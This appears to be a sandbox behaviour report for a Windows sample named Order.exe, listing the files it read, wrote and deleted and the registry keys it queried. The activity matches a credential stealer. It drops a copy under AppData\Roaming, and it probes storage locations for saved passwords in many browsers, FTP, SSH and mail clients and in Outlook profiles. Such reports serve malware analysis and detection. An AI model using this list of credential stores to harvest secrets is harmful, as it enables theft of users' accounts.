C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicetestlock.dat
C:\Windows\Microsoft.NET\ngenserviceclientlock.dat
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ndpsetup.bat
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\Order.exe.config
C:\Users\Seven01\AppData\Local\Temp\Order.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp
C:\Windows\System32\tzres.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb
C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat

Delete Files

C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs
C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp
C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\ngenserviceclientlock.dat

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Order.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\Order.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B204B4C2
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
